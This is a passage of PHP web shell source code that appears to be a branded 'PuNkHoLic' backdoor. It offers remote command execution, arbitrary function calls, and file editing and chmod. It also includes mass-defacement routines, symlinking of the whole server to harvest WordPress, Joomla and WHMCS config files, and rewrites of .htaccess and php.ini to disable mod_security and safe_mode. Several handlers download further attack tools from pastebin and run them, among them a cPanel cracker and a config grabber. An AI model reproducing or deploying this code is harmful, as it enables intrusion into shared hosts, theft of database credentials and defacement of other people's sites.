$temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"
\'")."';
";
echo strlen($temp), "
", $temp;
exit;
}
printHeader();
echo '<h1>String conversions</h1><div class=content>';
$stringTools = array(
'Base64 encode' => 'base64_encode',
'Base64 decode' => 'base64_decode',
'Url encode' => 'urlencode',
'Url decode' => 'urldecode',
'Full urlencode' => 'full_urlencode',
'md5 hash' => 'md5',
'sha1 hash' => 'sha1',
'crypt' => 'crypt',
'CRC32' => 'crc32',
'ASCII to HEX' => 'ascii2hex',
'HEX to ASCII' => 'hex2ascii',
'HEX to DEC' => 'hexdec',
'HEX to BIN' => 'hex2bin',
'DEC to HEX' => 'dechex',
'DEC to BIN' => 'decbin',
'BIN to HEX' => 'bin2hex',
'BIN to DEC' => 'bindec',
'String to lower case' => 'strtolower',
'String to upper case' => 'strtoupper',
'Htmlspecialchars' => 'htmlspecialchars',
'String length' => 'strlen',
);
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
foreach($stringTools as $k => $v)
echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
if(!empty($_POST['p1'])) {
if(function_exists($_POST['p1']))
echo htmlspecialchars($_POST['p1']($_POST['p2']));
}
echo"</pre></div>";
printFooter();
}
function actionFilesTools() {
if( isset($_POST['p1']) )
$_POST['p1'] = urldecode($_POST['p1']);
if(@$_POST['p2']=='download') {
if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
if (function_exists("mime_content_type")) {
$type = @mime_content_type($_POST['p1']);
header("Content-Type: ".$type);
}
$fp = @fopen($_POST['p1'], "r");
if($fp) {
while(!@feof($fp))
echo @fread($fp, 1024);
fclose($fp);
}
} elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
}
exit;
}
if( @$_POST['p2'] == 'mkfile' ) {
if(!file_exists($_POST['p1'])) {
$fp = @fopen($_POST['p1'], 'w');
if($fp) {
$_POST['p2'] = "edit";
fclose($fp);
}
}
}
printHeader();
echo '<h1>File tools</h1><div class=content>';
if( !file_exists(@$_POST['p1']) ) {
echo 'File not exists';
printFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
$gid = @posix_getgrgid(@fileowner($_POST['p1']));
echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
if( empty($_POST['p2']) )
$_POST['p2'] = 'view';
if( is_file($_POST['p1']) )
$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
else
$m = array('Chmod', 'Rename', 'Touch');
foreach($m as $v)
echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
echo '<br><br>';
switch($_POST['p2']) {
case 'view':
echo '<pre class=ml1>';
$fp = @fopen($_POST['p1'], 'r');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo '</pre>';
break;
case 'highlight':
if( is_readable($_POST['p1']) ) {
echo '<div class=ml1 style="background-color: black;color:black;">';
$code = highlight_file($_POST['p1'],true);
echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
}
break;
case 'chmod':
if( !empty($_POST['p3']) ) {
$perms = 0;
for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
if(!@chmod($_POST['p1'], $perms))
echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
else
die('<script>g(null,null,null,null,"")</script>');
}
echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
break;
case 'edit':
if( !is_writable($_POST['p1'])) {
echo 'File isn\'t writeable';
break;
}
if( !empty($_POST['p3']) ) {
@file_put_contents($_POST['p1'],$_POST['p3']);
echo 'Saved!<br><script>document.mf.p3.value="";</script>';
}
echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
$fp = @fopen($_POST['p1'], 'r');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo '</textarea><input type=submit value=">>"></form>';
break;
case 'hexdump':
$c = @file_get_contents($_POST['p1']);
$n = 0;
$h = array('00000000<br>','','');
$len = strlen($c);
for ($i=0; $i<$len; ++$i) {
$h[1] .= sprintf('%02X',ord($c[$i])).' ';
switch ( ord($c[$i]) ) {
case 0:$h[2] .= ' '; break;
case 9:$h[2] .= ' '; break;
case 10: $h[2] .= ' '; break;
case 13: $h[2] .= ' '; break;
default: $h[2] .= $c[$i]; break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
$h[1] .= '<br>';
$h[2] .= "
";
}
}
echo '<table cellspacing=1 cellpadding=5 bgcolor=#red><tr><td bgcolor=red><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#red><pre>'.$h[1].'</pre></td><td bgcolor=#red><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
break;
case 'rename':
if( !empty($_POST['p3']) ) {
if(!@rename($_POST['p1'], $_POST['p3']))
echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
else
die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
}
echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
break;
case 'touch':
if( !empty($_POST['p3']) ) {
$time = strtotime($_POST['p3']);
if($time) {
if(@touch($_POST['p1'],$time,$time))
die('<script>g(null,null,null,null,"")</script>');
else {
echo 'Fail!<script>document.mf.p3.value="";</script>';
}
} else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
}
echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
break;
case 'mkfile':
break;
}
echo '</div>';
printFooter();
}
function actionDefacer() {
printHeader();
echo "<h1>Recursive Mass Defacer</h1><div class=content>";
?>
<form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.path.value,this.file.value,this.Contents.value);return false;">
<p align="Left">Folder: <input type=text name=path size=60 value="<?=getcwd(); ?>">
<br>file name : <input type=text name=file size=20 value="index.htm">
<br>Text Content : <input type=text name=Contents size=20 value="Hacked by PuNkHoLic ">
<br><input type=submit value="Update"></p></form>
<?php
if ($_POST['a'] == 'Defacer') {
$mainpath = $_POST[p1];
$file = $_POST[p2];
$txtContents = $_POST[p3];
echo "-----------------------------------------------<br>
[+] Recursive Mass defacer<br>
-----------------------------------------------<br><br> ";
$dir = opendir($mainpath);
while ($row = readdir($dir)) {
$start = @fopen("$row/$file", "w+");
$code = $txtContents;
$finish = @fwrite($start, $code);
if ($finish) {
echo "http://$row/$file<br>";
}
if (strncasecmp(PHP_OS, 'WIN', 3) == 0) {
exec("for /r %cd% %i in (.) do @copy $file %i 1>NUL");
} else {
system("find $PWM -type d -exec cp $file {} \;");
}
}
echo "-----------------------------------------------<br><br>[+] Script by PuNkHoLic [+]";
}
echo '</div>';
printFooter();
}
function actionConsole() {
if(isset($_POST['ajax'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
ob_start();
echo "document.cf.cmd.value='';
";
$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("
$ ".$_POST['p1']."
".ex($_POST['p1']),"
\'"));
if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)){
if(@chdir($match[1])) {
$GLOBALS['cwd'] = @getcwd();
echo "document.mf.c.value='".$GLOBALS['cwd']."';";
}
}
echo "document.cf.output.value+='".$temp."';";
echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
$temp = ob_get_clean();
echo strlen($temp), "
", $temp;
exit;
}
printHeader();
echo '<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array("");
var cur = 0;
function kp(e) {
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
cur--;
if(cur>=0)
document.cf.cmd.value = cmds[cur];
else
cur++;
} else if(n == 40) {
cur++;
if(cur < cmds.length)
document.cf.cmd.value = cmds[cur];
else
cur--;
}
}
function add(cmd) {
cmds.pop();
cmds.push(cmd);
cmds.push("");
cur = cmds.length-1;
}
</script>';
echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
foreach($GLOBALS['aliases'] as $n => $v) {
if($v == '') {
echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
continue;
}
echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
}
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;" readonly>';
if(!empty($_POST['p1'])) {
echo htmlspecialchars("$ ".$_POST['p1']."
".ex($_POST['p1']));
}
echo '</textarea><input type=text name=cmd style="border-top:1;width:100%;" onkeydown="kp(event);">';
echo '</form></div><script>document.cf.cmd.focus();</script>';
printFooter();
}
function actionLogout() {
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
echo '<title>Get out Now</title><body bgcolor=#000000><center><img src="http://i.imgur.com/t54UCIw.jpgl"><br>
<style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), progress !important;}</style><a href="http://www.cursors-4u.com/cursor/2012/02/11/chrome-pointer.html" target="_blank" title="Chrome Pointer"><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Chrome Pointer" style="position:absolute; top: 0px; right: 0px;" /></a>
<span style="color:red;font: 20pt audiowide;">You are out now :D<br>www.facebook.com/PuNkHoLic</h2></span></center></body>';
}
///my editing start here for tools
function download_remote_file($file_url, $save_to)
{
$content = file_get_contents($file_url);
file_put_contents($save_to, $content);
}
if (isset($_POST['cp'])) {
download_remote_file('http://pastebin.com/raw/2Ntdj7ju', realpath("./") . '/cp.php');
header("location:cp.php");
}
if (isset($_POST['SymlinkbySmevk'])) {
download_remote_file('http://pastebin.com/raw.php?i=PhSk7Kvq', realpath("./") . '/SymlinkbySmevk.php');
header("location:SymlinkbySmevk.php");
}
if (isset($_POST['SymlinkbyCheetah'])) {
download_remote_file('http://pastebin.com/raw.php?i=EXejgAMv', realpath("./") . '/SymlinkbyCheetah.php');
header("location:SymlinkbyCheetah.php");
}
if (isset($_POST['SymlinkbyTorjan'])) {
download_remote_file('http://pastebin.com/raw.php?i=YUg4pXe2', realpath("./") . '/sym.py');
$url = 'http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . '/trjnx/';
header('location: '.$url);
system('python sym.py');
}
if (isset($_POST['jump'])) {
download_remote_file('http://pastebin.com/raw/MxtcT6nX', realpath("./") . '/jump.php');
header("location:jump.php");
}
if (isset($_POST['adminer'])) {
system('wget https://www.adminer.org/static/download/4.2.5/adminer-4.2.5-mysql-en.php adminer.php');
header("location:adminer-4.2.5-mysql-en.php");
}
if (isset($_POST['cg'])) {
download_remote_file('http://pastebin.com/raw/WSgkDHSN', realpath("./") . '/cg.php');
header("location:cg.php");
}
function actionImportScripts() {
printHeader();
echo '<table border="1px" align="center" id ="PuNkHoLictools" cellpadding="10" border-color"green"><tr><td>Just click and get the Script :).</td><tr><td>
<form action ="" method="post">
<input type = "submit" name="cp" value ="Cpanel Cracker"></td></tr>';
echo '<tr><td><form action ="" method="post"><input type = "submit" name="SymlinkbyTorjan"value ="Symlink Python Script By Torjan"></a></td></tr>';
echo '<td><form action ="" method="post"><input type = "submit" name="SymlinkbySmevk" value ="Symlink Script By SmEvK_PaThAn"></a></td></tr>';
echo '<tr><td><form action ="" method="post"><input type = "submit" name="SymlinkbyCheetah" value ="Symlink By Kashmiri Cheetah"></a></td></tr>';
echo '<tr><td><form action ="" method="post"><input type = "submit" name="jump" value ="Jumping Shell"></a></td></tr>';
echo '<tr><td><form action ="" method="post"><input type = "submit" name="adminer"value ="Adminer"></a></td></tr>';
echo '<tr><td><form action ="" method="post"><input type = "submit" name="cg"value ="Config Grabber"></a></td></tr>';
printFooter();
}
function actionShared() {
printHeader();
$file = @implode(@file("/etc/named.conf"));
if (!$file) {
die("# can't ReaD -> [ /etc/named.conf ]");
}
preg_match_all("#named/(.*?).db#", $file, $r);
$domains = array_unique($r[1]);
{
foreach ($domains as $domain) {
$user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
$array= "http://$domain " . $user['name'] . "<br>";
$lol= '' . get_current_user();
if (strpos($array, "$lol") !== false) {
$shared = str_replace(array(" $lol"), "", $array);
echo "<center>$shared";
}
}
}
printFooter();
}
function actionSymlink() {
printHeader();
echo '<h1>Symlink</h1>';
$furl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
$expld = explode('/',$furl );
$burl =str_replace(end($expld),'',$furl);
echo '<div class="content"><center>
<h3>[ <a href="#" onclick="g(\'symlink\',null,\'website\',null)">Domains</a> ] -
[ <a href="#" onclick="g(\'symlink\',null,\'whole\',null)">Whole Server Symlink<sup style="color:red;text-decoration:blink;"></sup></a> ] -
[ <a href="#" onclick="g(\'symlink\',null,\'config\',null)">Config files symlink</a> ]</h3></center>';
if(isset($_POST['p1']) && $_POST['p1']=='website')
{
echo "<center>";
$d0mains = @file("/etc/named.conf");
if(!$d0mains){
echo "<pre class=ml1 style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
} else {
echo "<table align=center class='main' border=0 ><tr><th> Domains </th></tr>";
$unk = array();
foreach($d0mains as $d0main){
if(@eregi("zone",$d0main)){
preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){
$unk[] = $domains[1][0];
flush();
}
}
}
$count=1;
$unk = array_unique($unk);
$l=0;
foreach($unk as $d){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$d));
echo "<tr".($l?' class=l1':'')."><td><a href=http://".$d."/>".$d."</a></td><td>".$user['name']."</td></tr>";
flush();
$count++;
$l=$l?0:1;
}
echo "</table>";
}
echo "</center>";
}
if(isset($_POST['p1']) && $_POST['p1']=='whole')
{
echo "<center>";
@mkdir('PCAPuNkHoLic_sym',0777);
$hdt= "Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any";
$hfp =@fopen ('PCAPuNkHoLic_sym/.htaccess','w');
fwrite($hfp ,$hdt);
if(function_exists('symlink')) {
@symlink('/','PCAPuNkHoLic_sym/root');
}
$d0mains = @file('/etc/named.conf');
if(!$d0mains) {
echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
echo "<table align='center' width='40%' class='main'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";
$dt = file('/etc/passwd');
$l=0;
foreach($dt as $d) {
$r = explode(':',$d);
if(strpos($r[5],'home')) {
echo "<tr".($l?' class=l1':'')."><td>".$j."</td><td>---</td><td>".$r[0]."</td><td><a href='PCAPuNkHoLic_sym/root".$r[5]."/public_html' target='_blank'>symlink</a></td></tr>";
$l=$l?0:1;
$j++;
}
}
echo '</table>';
} else {
echo "<table align='center' width='40%' class='main'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";
$count=1;
$mck = array();
foreach($d0mains as $d0main){
if(@eregi('zone',$d0main)){
preg_match_all('#zone "(.*)"#',$d0main,$domain);
flush();
if(strlen(trim($domain[1][0])) >2){
$mck[] = $domain[1][0];
}
}
}
$mck = array_unique($mck);
$usr = array();
$dmn = array();
foreach($mck as $o) {
$infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
$usr[] = $infos['name'];
$dmn[] = $o;
}
array_multisort($usr,$dmn);
$dt = file('/etc/passwd');
$passwd = array();
foreach($dt as $d) {
$r = explode(':',$d);
if(strpos($r[5],'home')) {
$passwd[$r[0]] = $r[5];
}
}
$l=0;
$j=1;
foreach($usr as $r) {
echo "<tr".($l?' class=l1':'')."><td>".$count++."</td>
<td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td>
<td>'.$r."</td>
<td><a href='PCAPuNkHoLic_sym/root".$passwd[$r]."/public_html' target='_blank'>symlink</a></td></tr>";
flush();
$l=$l?0:1;
$j++;
}
echo '</table>';
}
echo "</center>";
}
if(isset($_POST['p1']) && $_POST['p1']=='config')
{
echo "<center>";
@mkdir('PCAPuNkHoLic_sym',0777);
$hdt = "Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any";
$hfp = @fopen ('PCAPuNkHoLic_sym/.htaccess','w');
@fwrite($hfp ,$hdt);
if(function_exists('symlink')) {
@symlink('/','PCAPuNkHoLic_sym/root');
}
$d0mains=@file('/etc/named.conf');
if(!$d0mains) {
echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
}else {
echo "<table align='center' width='40%' class='main' ><tr><th> Count </th><th> Domain </th<th> User </th>><th> Script </th></tr>";
$count = 1;
$l=0;
foreach($d0mains as $d0main){
if(@eregi('zone',$d0main)){
preg_match_all('#zone "(.*)"#',$d0main,$domain);
flush();
if(strlen(trim($domain[1][0]))>2){
$user = posix_getpwuid(@fileowner('/etc/valiases/'.$domain[1][0]));
$c1 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/wp-config.php';
$ch01 = get_headers($c1);
$cf01 = $ch01[0];
$c2 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/blog/wp-config.php';
$ch02 = get_headers($c2);
$cf02 = $ch02[0];
$c3 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/configuration.php';
$ch03 = get_headers($c3);
$cf03 = $ch03[0];
$c4 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/joomla/configuration.php';
$ch04 = get_headers($c4);
$cf04 = $ch04[0];
$c5 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/includes/config.php';
$ch05 = get_headers($c5);
$cf05 = $ch05[0];
$c6 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/vb/includes/config.php';
$ch06 = get_headers($c6);
$cf06 = $ch06[0];
$c7 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/forum/includes/config.php';
$ch07 = get_headers($c7);
$cf07 = $ch07[0];
$c8 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'public_html/clients/configuration.php';
$ch08 = get_headers($c8);
$cf08 = $ch08[0];
$c9 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/support/configuration.php';
$ch09 = get_headers($c9);
$cf09 = $ch09[0];
$c10 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/client/configuration.php';
$ch10 = get_headers($c10);
$cf10 = $ch10[0];
$c11 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/submitticket.php';
$ch11 = get_headers($c11);
$cf11 = $ch11[0];
$c12 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/client/configuration.php';
$ch12 = get_headers($c12);
$cf12 = $ch12[0];
$c13 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/includes/configure.php';
$ch13 = get_headers($c13);
$cf13 = $ch13[0];
$c14 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/include/app_config.php';
$ch14 = get_headers($c14);
$cf14 = $ch14[0];
$c15 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/sites/default/settings.php';
$ch15 = get_headers($c15);
$cf15 = $ch15[0];
$out = ' ';
if(strpos($cf01,'200') == true){ $out = "<a href='".$c1."' target='_blank'>Wordpress</a>"; }
elseif(strpos($cf02,'200') == true){ $out = "<a href='".$c2."' target='_blank'>Wordpress</a>"; }
elseif(strpos($cf03,'200') == true && strpos($cf11,'200') == true) { $out = " <a href='".$c11."' target='_blank'>WHMCS</a>"; }
elseif(strpos($cf09,'200') == true){ $out = " <a href='".$c9."' target='_blank'>WHMCS</a>";}
elseif(strpos($cf10,'200') == true){ $out = " <a href='".$c10."' target='_blank'>WHMCS</a>"; }
elseif(strpos($cf03,'200') == true){ $out = " <a href='".$c3."' target='_blank'>Joomla</a>"; }
elseif(strpos($cf04,'200') == true){ $out = " <a href='".$c4."' target='_blank'>Joomla</a>"; }
elseif(strpos($cf05,'200') == true){ $out = " <a href='".$c5."' target='_blank'>vBulletin</a>";}
elseif(strpos($cf06,'200') == true){ $out = " <a href='".$c6."' target='_blank'>vBulletin</a>";}
elseif(strpos($cf07,'200') == true){ $out = " <a href='".$c7."' target='_blank'>vBulletin</a>";}
elseif(strpos($cf08,'200') == true){ $out = " <a href='".$c7."' target='_blank'>Client Area</a>";}
elseif(strpos($cf12,'200') == true){ $out = " <a href='".$c7."' target='_blank'>Client Area</a>";}
elseif(strpos($cf13,'200') == true){ $out = " <a href='".$c7."' target='_blank'>osCommerce/Zen Cart</a>";}
elseif(strpos($cf14,'200') == true){ $out = " <a href='".$c7."' target='_blank'>Magento</a>";}
elseif(strpos($cf15,'200') == true){ $out = " <a href='".$c7."' target='_blank'>Drupal</a>";}
else {
continue;
}
echo '<tr'.($l?' class=l1':'').'><td>'.$count++.'</td><td><a href=http://www.'.$domain[1][0].'/>'.$domain[1][0].'</a></td><td>'.$user['name'].'</td><td>'.$out.'</td></tr>';
flush();
$l=$l?0:1;
}
}
}
echo "</table>";
}
echo "</center>";
}
echo "</div>";
printFooter();
}
function actionJumping()
{printHeader();
echo '<html><head><title>'.getenv("HTTP_HOST").' - Jumping Server</title></head><body>';
($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<font size="4" color="#000000" face="Calibri"><b>Error: Safe_mode = On</b></font>');
set_time_limit(0);@$passwd = fopen('/etc/passwd','r');if (!$passwd) { die('<font size="4" color="#000000" face="Calibri"><b>[-] Error : Coudn`t Read /etc/passwd</b></font>'); }
$pub = array();$users = array();$conf = array();$i = 0;while(!feof($passwd)){$str = fgets($passwd);if ($i > 100){ $pos = strpos($str,':');$username = substr($str,0,$pos);$dirz = '/home/'.$username.'/public_html/';if (($username != '')) { if (is_readable($dirz)) { array_push($users,$username);array_push($pub,$dirz); }}}$i++;}
echo '<font color=aqua> [-]==================[ START ]==================[-]<br></font>';
foreach ($users as $user){echo "<font color=#a3e956> [+] /home/$user/public_html/</font><br/>";} echo "
<font color=aqua><br>[-]==================[ FINISH ]==================[-] <br></font>
"; echo '</body></html>';
printFooter();
}
function actionSubdomain() {
printHeader();
error_reporting(0);
$user = get_current_user();
$open = opendir('/home/' . $user . '/access-logs/');
while ($dir = readdir($open)) {
$totalDoamin[] = $dir;
}
closedir($open);
$total = count($totalDoamin);
$domain = $total - 2;
if ($domain > 0) {
echo "<h2><b><font style=\"color: #a3e956 ;\" > ~ Total </font><font style=\"color: #a3e956; \">" . $domain . "</font><font style=\"color: #a3e956;\" > Sub Domain Found! ~ </font><br><BR>";
} else {
echo "<h2><b> ~ <font color='red' style=\"color: red; text-shadow: red 0px 0px 4px ; \">0</font><font style=\"color: #black; text-shadow: black 0px 0px 6px ;\"> Sub Domain Found! ~</font><br><BR>";
}
$scan = array_diff(scandir('/home/' . $user . '/access-logs/'), array('.'));
$domains = implode("
http://", $scan);
echo '
<style>
body {
text-align: center;
}
</style><textarea style="color: #a3e956; background-color: black" rows=\'30\' cols=\'100\'>';
print_r($domains);
echo '</textarea>';
printFooter();
}
function actionSym() {
printHeader();
$file = @implode(@file("/etc/named.conf"));
if (!$file) {
die("# can't ReaD -> [ /etc/named.conf ]");
}
preg_match_all("#named/(.*?).db#", $file, $r);
$domains = array_unique($r[1]);
{
foreach ($domains as $domain) {
$user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
$array= "<br>http://$domain<br>";
$lol= '' . get_current_user();
if (strpos($array, "$lol") == false) {
$shared = str_replace(array(" $lol"), "", $array);
echo "<center>$shared";
}
}
}
printFooter();
}
function actionBypass() {
printHeader();
echo '<h1>Safe Mode</h1>';
echo '<div class="content">';
echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh] files create in following dir<br>| ".$GLOBALS['cwd']." |<br><br />";
echo '<a href=# onclick="g(null,null,\'php.ini\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\'ini\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\'sh\')">| .htaccess(perl) | </a></center>';
if(!empty($_POST['p2']) && isset($_POST['p2']))
{
$fil=fopen($GLOBALS['cwd'].".htaccess","w");
fwrite($fil,'<IfModule mod_security.c>
Sec------Engine Off
Sec------ScanPOST Off
</IfModule>');
fclose($fil);
}
if(!empty($_POST['p1'])&& isset($_POST['p1']))
{
$fil=fopen($GLOBALS['cwd']."php.ini","w");
fwrite($fil,'safe_mode=OFF
disable_functions=NONE');
fclose($fil);
}
if(!empty($_POST['p3']) && isset($_POST['p3']))
{
$fil=fopen($GLOBALS['cwd'].".htaccess","w");
fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .sh
AddHandler cgi-script .pl
AddHandler cgi-script .pl');
fclose($fil);
}
echo "<br><br /><br /></div>";
echo '</div>';
printFooter();
}
function actionDeface() {
printHeader();
echo "<h1>Mass Defacer by PuNkHoLic</h1><div class=content>";
?>
<form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.path.value,this.file.value,this.Contents.value);return false;">
<p align="Left">Folder: <input type=text name=path size=60 value="<?=getcwd(); ?>">
<br>file name : <input type=text name=file size=20 value="index.php">
<br>Text Content : <input type=text name=Contents size=70 value="Add your deface txt here">
<br><input type=submit value="Deface now"></p></form>
<?php
if ($_POST['a'] == 'Deface') {
$mainpath = $_POST[p1];
$file = $_POST[p2];
$txtContents = $_POST[p3];
echo "PuNkHoLic";
$dir = opendir($mainpath); //fixme - cannot deface when change to writeable path!!
while ($row = readdir($dir)) {
$start = @fopen("$row/$file", "w+");
$code = $txtContents;
$finish = @fwrite($start, $code);
if ($finish) {
echo "$row/$file > Done<br><br>";
}
}
}
echo '</div>';
printFooter();
}
function actionDomain() {
printHeader();
echo '<h1>Local Domains</h1><div class=content>';
$file = @implode(@file("/etc/named.conf"));
$Domain_path = "/var/named";
if (!$file) {
$domains = scandir($Domain_path);
$count=1;
$dc = 0;
echo "<table align=center border=1 width=59% cellpadding=5>
<tr><td colspan=2>There are : ( <b>" . count($domains) . "</b> ) Domains in this Sever.Can't read named.cof .Domains are bypassed actually,you will face problem in symlink. </td></tr>
<tr><td>No</td><td>Domain</td><td>User</td></tr>";
foreach ($domains as &$domain) {
if (stripos($domain,".db")) {
$domain = str_replace('.db','',$domain);
}
if (strlen($domain) > 6) {
echo "<tr><td>".$count++."</td><td><a href='http://".$domain."' target='_blank'>".$domain."</a></td><td>User</td></tr>";
}
}
echo "</table>";
}else{
$count = 1;
preg_match_all("#named/(.*?).db#", $file, $r);
$domains = array_unique($r[1]);
echo "<table align=center border=1 width=59% cellpadding=5>
<tr><td colspan=2> There are( <b>" . count($domains) . "</b> ) Domains in this Sever.I think you have got something this time yeah!!!.</td></tr>
<tr><td>No</td><td>Domain</td><td>User</td></tr>";
